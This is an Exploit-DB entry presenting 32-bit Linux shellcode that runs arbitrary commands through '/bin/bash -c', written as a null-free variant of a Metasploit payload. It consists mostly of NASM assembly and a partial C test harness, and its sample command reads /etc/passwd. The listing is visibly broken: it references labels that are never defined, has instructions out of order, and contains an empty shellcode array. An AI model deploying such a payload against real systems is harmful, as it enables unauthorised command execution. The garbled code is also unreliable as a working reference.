Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)

ID EDB-ID:40924
Type exploitdb
Reporter Exploit-DB
Modified 2016-12-16T00:00:00


Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes). Shellcode exploit for Lin_x86 platform

;author:    Filippo "zinzloun" Bersani
;date:      16/12/2016
;version:   1.0
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
;           Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
;           Linux bb32 4.4.0-45-generic 32bit
;72 bytes
   executes arbitrary command through /bin/bash -c "command"
    a slightly different and null free version of the metasploit payload:
	that is not null free. Crashed on 2 vm of my lab enviroment: OpenSuse001 and bb32
	so I coded this version, anyway thx 2 vlad902 for the great idea

;see comment for details

global _start			

section .text

xor eax,eax			;zeroing registers
xor edx,edx
mov al,0xb			;int execve(const char *filename, char *const argv[], 
                        ;        char *const envp[]);

push   edx			;null
push   word 0x632d 	;-c
mov edi,esp			;save in edi the -c value

push edx			;null
push 0x68736162		;////bin/bash
push 0x2f6e6962
push 0x2f2f2f2f

mov ebx,esp			;set first arg in ebx=*filename	
push   edx			;null

jmp short push_cmd	;jump to collect the command

 push edi			;push -c value
 push ebx			;push ////bin/bash
 mov ecx,esp		;*argv = ////bin/bash, -c, cmd, null
 int    0x80

 call set_argv
 cmd: db "cat /etc/passwd;echo do__ne"


unsigned char code[] = \

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;